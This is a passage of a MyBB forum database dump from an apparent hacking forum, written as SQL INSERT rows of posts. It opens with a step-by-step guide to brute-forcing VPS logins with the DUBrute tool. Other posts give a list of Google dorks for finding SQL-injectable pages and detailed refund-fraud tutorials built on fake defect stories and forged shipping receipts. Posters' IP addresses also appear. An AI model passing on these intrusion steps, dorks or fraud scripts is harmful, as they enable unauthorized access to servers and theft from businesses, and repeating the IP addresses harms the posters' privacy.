[img]http://i.imgur.com/eJjha.png[/img] [color=#FF4500] [size=xx-large] 4) [/size] [/color] Once you have clicked \"Start Scan\" a cmd window will come up and just let it do its thing. After its done you should see the \"Start Scan\" Button fading in and out. When you see it fading in and out, You have to press \"Save List\" and save it to desktop. [color=#FF4500] [size=xx-large] 4) [/size] [/color] Now open the DU Brute folder and open DU Brute.exe. Once you have opened it click \"Generation\" [img]http://i.imgur.com/uAwaV.png[/img] [color=#FF4500] [size=xx-large] 5) [/size] [/color] Once you have clicked Generation, click \"File IP\" and pick the IP list you saved to your desktop. Then click on \"File Login\" and go to the DUBrute folder and click on \"usernames\" Now after you have that done go to \"File Pass\" and open the \"Passwords\" Folder that is in the DUBrute folder, And pick one of the password lists. [img]http://i.imgur.com/4fk6P.png[/img] [color=#FF4500] [size=xx-large] 6) [/size] [/color] After you have done that, Press \"Make\" and then it should be finished pretty fast then press \"Ok\" in the new windows that pops up. Now just exit out of \"Generation\" and press \"start\" on DU Brute. [img]http://i.imgur.com/4fk6P.png[/img] [color=#FF4500] [size=xx-large] 7) [/size] [/color] [/size] [size=medium] Then this is the long part, You just need to wait for it to do its thing. This may take a shitwhile but at the end you could have a list of VPS logins. Anyways, Hope this helps and hope you guys get some VPS\'s and If you need help with anything please PM me or post on this thread! [/size]', '71.67.179.16', '1195619088', '1', '0', '1', '1350003093', '1', 'e378ab6e266c10ed25eccda6aa49d751', '0', '1350003093'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4284', '782', '4243', '7', 'RE: We need to advertise!', '0', '1', 't3h jok3r', '1350003167', '[quote=\'R?????zo?\' pid=\'4243\' dateline=\'1349959657\'] we have been banned from google so the only thing we can do is refer members. [/quote] I announced in the the chat and on Twitter that we have been unbanned.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '12f7b660480346b09e94c999a2193fc4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3645', '718', '0', '16', 'Apple Cookie Case', '0', '214', 'Rave™', '1349542676', '[align=center] [color=#FFA500] I managed this pretty easily a couple of days ago with just a few emails. The case is pretty nice, check it out at Cookiecase- Premium case for the iPod Touch 4g Email them at cookiecatllc@gmail.com with an excuse about why the case is shit. Be imaginative. If they ask for an order number, say someone bought it for you as a present. If they ask for an order number off that person, say they got it from eBay or something. They should send you a replacement case.[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'deb101c95cb4d1d33e6958fdebaa5dff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3646', '719', '0', '16', 'AstroPID Clean', '0', '214', 'Rave™', '1349542721', '[align=center] [size=large] [color=#32CD32] Download link: http://www.mediafire.com/?mnzx7haqo53cgy0 Scan: https://www.virustotal.com/file/4bf38f9c2fdda335861feb3a3d11b39ebbc3d7ca71be726f977bd7ab46027b5f/analysis/ Its clean, I use this. [/color][/size][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '98857f6af5d1fcdfcc60b65af79a6883', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3647', '720', '0', '16', 'How to find Serial/PID', '0', '214', 'Rave™', '1349542771', '[align=center] [color=#FF0000] 1) First, lets go on a site that most people visit every day. YouTube.com. 2) Once we\'ve decided on the product, we can go and search for a serial. For example, if I wanted a Samsung BX2450 24\" monitor, I\'d search \"Samsung BX2450 unbox\" 3)Now filter your searches to only HD video, or as high resolution as possible. 4)Go through the video, and find the spot where it shows the back, or the serial area, and pause the video. 5) Write down the Serial number, the details, videoID, and take a screenshot for future reference 6) SE and enjoy! Search dork: \"%productname% unboxing\" or \"%productname% unbox\" Try \'tigerdirectblog\', they unbox a lot of stuff This will also work to get an IMEI and corresponding serial for phones OR Another Method: 1) Go on Ebay or CL 2) Find said product 3) Say that you have bought a fake item on the site before, and you don\'t want to get ripped off again, so you are asking for the serial so that you can confirm it\'s real [img]http://i.imgur.com/huOWW.png[/img] [/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '44b802437a6fde26e58b1d7c0feb523c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3648', '721', '0', '16', 'Microphone', '0', '214', 'Rave™', '1349542822', '[align=center] [color=#00BFFF] Hello everyone. I decided I would make a revamped tutorial today on the Blue Yeti Microphone. The old one posted by Bobrichards does not work very well. So this is my revamped tut. Still giving Bobrichards credit for finding out they were SEable! Please note you will need the following: Photoshop A Brain This is a long tut! If you do not have the required items you can not do this tut. A brain is vital for this tutorial. I pretty much breast fed you guys here but I can imagine someone PMing me saying \"make me a shipping receipt bro\". I did this all within a day and it got shipped out the next day! Lets get on with the tut. Steps: 1. Head over to http://www.bluemic.com/salesandsupport/s...equest.php (May be different if not in US) 2. Fill out the information and say something along the lines of \"The microphone will not work. It is not being detected by my computer. I even tried it on several other computers including a mac, a laptop, and my dads desktop\" 3. They will go over some troubleshooting steps and just say \"Nothing is working\" 4. They will ask to setup an RMA. Tell them that you need it in a hurry like \"I do a lot of youtube reviews with this beautiful microphone to keep my viewers happy with the sound quality. I would be really happy if I could get the microphone asap!\" 5. They will say something like. \"Ok we can do cross shipping, what that means is that you ship it to us then when you get a tracking number send that to us and we can send you out a new one!\" 6. Say something like \"Ok great! I will ship it out tomorrow!\" P.S Make sure the day you are going to ship it out is not sunday or saturday lol. 7. Look in the email they sent or their website for a RMA address 8. This is where photoshop is involved. Download my shipping template here: http://www.mediafire.com/?cdq49f6pwcqlyka 9. Now open up the template and edit the setting to your liking. This is where you need some knowledge. You need to edit dates and cites and everything. Make sure it looks legit as possible. I cannot really show you exactly what to do considering I do not have photoshop installed. I just got a new computer for xmas and have to redownload everything. 10. To calculate shipping go here http://postcalc.usps.gov/ 11. It is a lot of work ik but now you need to get the shipping dimensions and estimate the weight of the box. From amazon it says this: Product Dimensions: 5 x 5.5 x 10 inches ; 3.5 pounds Shipping Weight: 5.2 pounds 12. Edit the receipt so the weight is around 5.3 pounds 13. Use the shipping calculator to calculate the cost of the shipping. 14. After everything is done, download GIMP 2 and use the blur tool to blur out the receipt to make it a little more legit. 15. Save the photo and upload it to photobucket or just screen cap it with speedcap. 16. Email them back saying something like I did: \"Hello! I shipped the item out today but the shipping was around ____ *(enter your shipping cost here)*, I am on a tight budget for my wifes birthday so I need to save as much money as possible. I am so sorry but I did not get a tracking number. Is it possible I can still get the microphone?\" 17. They should say \"No problem! We understand the situation you are in. Can you please send us a receipt to verify that you shipped it out?\" 18. Play dumb and say \"Sure I have this old scanner and I can upload the receipt. *Attach pic to email* 19. They should say everything is fine and they will ship out your brand new Yeti.[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '065dc368bda8843fd0297bf7f00e02ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3649', '722', '0', '16', 'Plantronics GameCom 780 Surround Sound Gaming Headset', '0', '214', 'Rave™', '1349542879', '[align=center] [color=#32CD32] Hello Everyone This Is My First Post On This Forum! 1.Go to your email and send email to plantronics (You Can Find Their Email From Their Site) Say That You Got Those Headphones From Your Aunt As Birthday Present And They Have Been Great Headphones But Now Suddenly They Stopped Working After 2 Weeks I Thought That Something Was Wrong With My PC I Tried Them Also With My Other PC And Reinstalled Drivers But it Didnt Helped. Before This They Worked Perfectly And Sound Was So Clean But Im Little Bit Dissapointed Now. ( My Story EDIT IT Little Bit) 2. They Will Answer Asking Something Like This : Please check if the headset is recognized as a an audio device in Control Panel. Also try to install the headset in a different USB port. Is there any error message? 3.Say that you tried and there is no any error message 4.Then they will Told You Do Replacement They Give Site Where You Fill All Info. 5. Success Now Just Wait And When Your Gaming Headset Arrives There Will Be Paper Saying Please Send Broken One Back To Plantronics just fuck it.[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '229fbf32eb9062bfe40dbd87b51fc777', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3650', '723', '0', '16', 'iFrogs', '0', '214', 'Rave™', '1349542930', '[align=center] [color=#FFA500] Hello! Here you will learn how to social engineer iFrogz for free products. Note that I have embedded in here a specific number, if I find this leaked, I can get the number from it. If it matches your number, things wont be pretty…this wont make you hundreds of dollars but is good for beginners. Requirements Creativity Fake receipt/Photo (I can provide for black/white earbuds) Patience 1. Go to the iFrogz website at: http://www.ifrogz.com 2. Find the desired product, in this tut we will use iFrogz Plugz with Mic 3. Find “Contact Us” and fill out the required information. 4. For the complaint, we will want to be polite and respectful, for headphones/earbuds, a good defect is no sound coming out of an earbud/cup. Here is a good complaint, do not copy word for word or it will get saturated. READ STEP 5 BEFORE SUBMITTING! Hello, thank you for taking time to view my submission. Recently I have purchased a (product here) as I have heard nothing but great feedback! However, upon using the items I noticed (defect here). As you can tell, this is disappointing because I thought I could rely on them. Thank you again for the time, I will be greatly anticipating a reply. 5. There are a few ways to do this. You can say you got them as a gift, you can say that you bought them. I said I got them for my birthday to avoid having to show a receipt. However, if you say you purchased them, you can make a fake receipt (or have someone else make you one). 6. They will email you back asking to send the product in, now we got to be creative. I told them I am HIV+ and I got blood on it when I got a paper cut, that would make it illegal to send, be creative though don’t use the same thing I used or it will get saturated quickly… 7. They will reply asking for a receipt, I’m pretty sure you NEED this in order to actually get it, but use a fake receipt made at http://www.customreceipt.com, make sure the info on the receipt at least looks legit. Attach the receipt to the email (if you said you got s a gift, tell them whoever got you it found the receipt). 8. They will ask for two things after this, shipping info, and the product name/color. 9. You will receive the product within 10 business days! (I got mine in 1 day[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'a4023087128ca97846263f80c4ba2797', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3651', '724', '0', '74', 'Cheese Cake Client', '0', '214', 'Rave™', '1349543370', '[b] Enjoy![/b] http://www.mediafire.com/?wxt82vm5ag3xgg5', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '2de87dde347a9a459327bd8bcc926d3b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3652', '725', '0', '7', 'L33THacking Cloudflare Resolver!', '0', '214', 'Rave™', '1349543426', '[align=center] [color=#98FB98] [size=x-large] Enjoy! http://kasual.ulmb.com/[/align] [/size][/color]', '71.67.179.16', '1195619088', '1', '0', '214', '1349543463', '1', 'ebd4bd777725086cfc3fe5f6d2c074b2', '0', '1349543463'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3653', '726', '0', '13', 'Dorks', '0', '214', 'Rave™', '1349543495', 'Hey guys ENJOY [spoiler] [quote] inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= [/quote] [/spoiler]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '3c345a776b4fea32b17a8e78634ec2fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3654', '727', '0', '35', 'Rate My Thread Design + Download', '0', '214', 'Rave™', '1349543534', '[b]Hey Guys, I just finished my first thread design. Constructive Critisicm is accepted. Don\'t troll please.[/b] Preview: [spoiler] [img]http://i.imgur.com/5z8wf.png[/img] [/spoiler] DOWNLOAD: [url=http://www.mediafire.com/?z38x1423nkkqn3c]Nice Job Kasual[/url]', '71.67.179.16', '1195619088', '1', '0', '214', '1349543919', '1', 'f34214ebb8264e05efc1130c84f4d493', '0', '1349543919'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3655', '728', '0', '8', '[Sick Heavy] My first Dubstep Album [Sick Heavy]', '0', '214', 'Rave™', '1349543956', '[b] [color=#0000CD]Hey guys this is my first dubstep album[/b] DOWNLOAD: [url=http://www.mediafire.com/?sq218m6u88vz254]CLICK ME IF YOU LIKE GIRLS[/url][/color]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '02d21027c61661555b5edb7ef5ef56c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3656', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '3', '??????????¢™', '1349545785', 'Nice, Great giveaway you got here.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '01383c97798c96fca3a9c08530be2cef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3657', '729', '0', '7', 'Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349545873', 'Hey guys, I know this isn\'t really the right place to put this but i just want to spread the word around. There is a new virus that is going around on skype right now. What it does is once you click the link it sends the link to all your friends in skype. It also installs a backdoor into your computer, And keyloggers and other files. It blocks deletion of the virus, Cmd and taskman. This thing spreads like wild fire, I already have 30 friends infected with it. The virus will send a mass message like this [quote]lol is this your new profile pic? (Link)img=Your Skype Username[/quote] Do not click the link, The only known way to remove this as of now is to find it (which is pretty hard considering that it remakes the virus and binds it to everything in sys32) Or find an anti virus that it hasn\'t blocked that will pick it up. If you see someone sending the links i would advise to remove them.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '454e62dac4b940a23d7f8749b561f5a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3659', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '82', 'iTzIpod', '1349547005', 'Lool. Seems legit. :p But anyways good luck!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9879cd512750602d28aaf3de26648953', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3660', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '82', 'iTzIpod', '1349547054', 'I also drink Coke, Iced Tea, Arizona, and sometimes, Fruitopia', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8901a5fce1c60fc46a376894268a1325', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3661', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349547090', 'Yeah . Lets hope so. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e696ae798306038aac8040aed80efa7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3664', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1349547225', 'Alright. I don\'t remember closing any threads lately. But oh well. :p I have a short memory.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '53d374fe5c10e38af40890311216873d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3665', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349547257', 'Anyways, hope your group gets approved! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '588fb0bb0d42e2b908e4d5001c90b56f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3666', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349547291', '/me is really bored right now. And doesn\'t know what to do.. Might play some CoD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3284decb53846d4fba3f6fbd92764492', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3667', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349547322', 'Banned because you\'re a flamingworm', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aea68bc7bc40452d7e560d8cb5b1bf1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3668', '691', '3517', '3', 'RE: Gaming Section Released', '0', '82', 'iTzIpod', '1349547355', 'Meh. Gonna wait for Black Ops 2 :D Hell yeah. Black Ops & Black Ops 2 <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd9bf45b8685525e00a2c109b9093b0ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3669', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1349547400', 'No you don\'t. I win. So I get a cookie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '317058cc77534a4dd08ebee67c90f881', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3670', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1349547437', 'I got a bunch of Minecraft Accounts. Just got a bunch from a list of my friend\'s.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00bbdab915ab8946a13acf037a364ecf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3671', '706', '3633', '4', 'RE: Supppp', '0', '82', 'iTzIpod', '1349547475', 'Welcome to L33tHacking dude. Enjoy your stay! - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9f121c3b6f61418cc5e589bc7598e922', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3672', '706', '3633', '4', 'RE: Supppp', '0', '1', 't3h jok3r', '1349547500', 'Welcome to L33THacking. Nice introduction especially the girls in your signature ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'de176a86a5b136c83031cb77bd49f779', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3673', '707', '3634', '13', 'RE: How to migrate CRACKED minecraft accounts!', '0', '82', 'iTzIpod', '1349547508', 'I saw this a couple hours ago earlier today. But, nice share! :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1ac51971e6ba700977135d647d26d847', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3674', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '82', 'iTzIpod', '1349547542', 'Looks nice! I will download this after I come home.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '898fb972b5ac6b38c5e43324ffa6d8fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3675', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '82', 'iTzIpod', '1349547576', 'Don\'t know how to use this. Can you teach me? :/ Nice share.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cbe8a7a07f44316c20a2880878438f26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3676', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '1', 't3h jok3r', '1349547940', 'What is a cheese cake client?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '40c7650608dc1f202d06794d16eb0cb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3677', '730', '0', '72', 'Need for Speed Most Wanted limited edition', '0', '1', 't3h jok3r', '1349548040', 'Who\'s planning on buying Need for Speed Most Wanted limited edition?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '284fa27b3b463aadc44e3f71896c58e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3678', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1349548100', 'I knew about this earlier today. But I didn\'t click on any. Hopefully I don\'t get infected. Not going to be downloading or clicking any links on Skype Just for safety reasons.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50cb65ea6862d4287ea500ffe48a4560', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3679', '730', '3677', '72', 'RE: Need for Speed Most Wanted limited edition', '0', '82', 'iTzIpod', '1349548220', 'Not me. I\'m not really into Need For Speed', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ffb04609205cd14f735f1fc54a1c7ada', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3734', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349585832', 'Sure, we would are always looking forward for great new changes. I was planning to center the logo but I don\'t know such a simple task is taking so long. I was also banning to add a background picture, behind (DUH) the logo.', '72.231.24.165', '1223104677', '1', '0', '1', '1349586384', '1', '43aae80a6f7b256d137599866987c040', '0', '1349586384'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3682', '446', '3599', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1349548786', '[quote=\'flamingworm\' pid=\'3576\' dateline=\'1349498504\'] No No No....like what is your advertising 